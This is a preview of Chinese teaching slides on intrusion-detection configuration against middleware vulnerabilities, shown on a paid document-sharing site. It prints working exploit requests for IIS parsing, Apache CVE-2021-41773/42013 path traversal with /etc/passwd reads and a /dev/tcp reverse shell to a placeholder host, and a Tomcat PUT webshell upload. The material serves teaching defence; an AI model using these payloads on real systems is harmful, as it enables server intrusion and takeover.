- 1、本文档共27页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
关于漏洞后门防护的
入侵检测配置
1中间件漏洞
IIS解析漏洞IIS6.0版本,会将“1.asp;.ipg”这样的文件当作ASP文件解析。在计算机对文件扩展名的理解上来说,文件扩展名是以最后一个“.”的后面内容为据的,这个文件被网站过滤程序理解成了图片。而实际上,IIS会认为分号即是结尾,后面内容被“截断”了,认为这是ASP文件,于是产生了差异,差异即是不安全。OPTIONS/xHTTP1.1Host:探测是否允许PUT方法上传PUT/x.txtHTTP1.1Host:Content-Length:30%executerequest(“123456”)%#上传的内容上传一个txt文件COPY/x.txtHTTP1.1Host:Destination:/cmd.asp#将x.txt重命名为cmd.asp(由于解析漏洞)通过move或copy重命名文件
Apache解析漏洞因为Apache认为一个文件可以拥有多个扩展名,哪怕没有文件名,也可以拥有多个扩展名。Apache认为应该从右到左开始判断解析方法的。如果最右侧的扩展名为不可识别的,就继续往左判断,直到判断到文件名为止。
Apache漏洞-CVE-2021-41773ApacheHTTPServer2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。GET/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd文件读取POST/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/shHTTP/1.1Host:7:53238Content-Type:text/plainContent-Length:8echo;idRCE命令执行
Apache漏洞-CVE-2021-42013ApacheHTTPServer2.4.50中针对CVE-2021-41773的修复不够充分。攻击者可以使用路径遍历攻击将URL映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,则这可能允许远程代码执行。POST/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/shHTTP/1.1Host::29045Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection:closeContent-Type:application/x-www-form-urlencodedecho;echoexec/bin/sh0/dev/tcp/x.x.x.x/88881020/tmp/a.shRCE命令执行
Tomcat解析漏洞-CVE-2017-12615CVE-2017-12615漏洞称之为TomcatPUT方法任意写文件漏洞,类似IIS的PUT上传漏洞。该漏洞可以利用HTTP的PUT方法直接上传webshell到目标服务器,从而获取权限。该漏洞是高危漏洞,在Tomcat的web.xml默认情况下不存在该漏洞,但是一单开发者或者运维人员手动讲web.xml中的readonly设置为false,可以通过PUT/DELETE进行文件操控。PUT/shell.jsp/HTTP/1.1Host:Content-Length:10%Processprocess=Runtime.getRuntime().exec(request.getParameter(cmd));%POC
2框架漏洞
Struts2-S2-01漏洞原理:该漏洞因用户提交表单数据
您可能关注的文档
- 建筑装饰工程技术专业人才培养方案(二年制,中高职3+2).pdf
- 建筑装饰工程技术专业人才培养方案(三年制).pdf
- 酒店专业专业人才培养方案(东西协作).pdf
- 空乘专业(安检)方向专业人才培养方案(三年制).pdf
- 空乘专业人才培养方案(三年制).pdf
- 临床医学专业人才培养方案.pdf
- 旅游管理专业人才培养方案(二年制).pdf
- 旅游管理专业人才培养方案(三年制).pdf
- 旅游管理专业人才培养方案(研学旅行方向,三年制).pdf
- 旅游英语专业人才培养方案.pdf
- 《网络攻防与协议分析》课件——1.入侵检测系统的基本概念.pptx
- 《网络攻防与协议分析》课件——1.网络扫描.pptx
- 《网络攻防与协议分析》课件——2.SNORT介绍及策略配置.pptx
- 《网络攻防与协议分析》课件——2.常见WEB漏洞的攻击原理及入侵检测配置.pptx
- 《网络攻防与协议分析》课件——2.异常包攻击.pptx
- 《网络攻防与协议分析》课件——3.病毒文件.pptx
- 《网络攻防与协议分析》课件——3.文件上传下载漏洞的入侵检测配置.pptx
- 《网络攻防与协议分析》课件——4.DDoS攻击原理及入侵检测配置.pptx
- 《网络攻防与协议分析》课件——5.关于用户操作行为的入侵检测配置.pptx
- 《现代汉语》课件——【思政元素】从汉语热看中国传统文化的魅力.pptx
文档评论(0)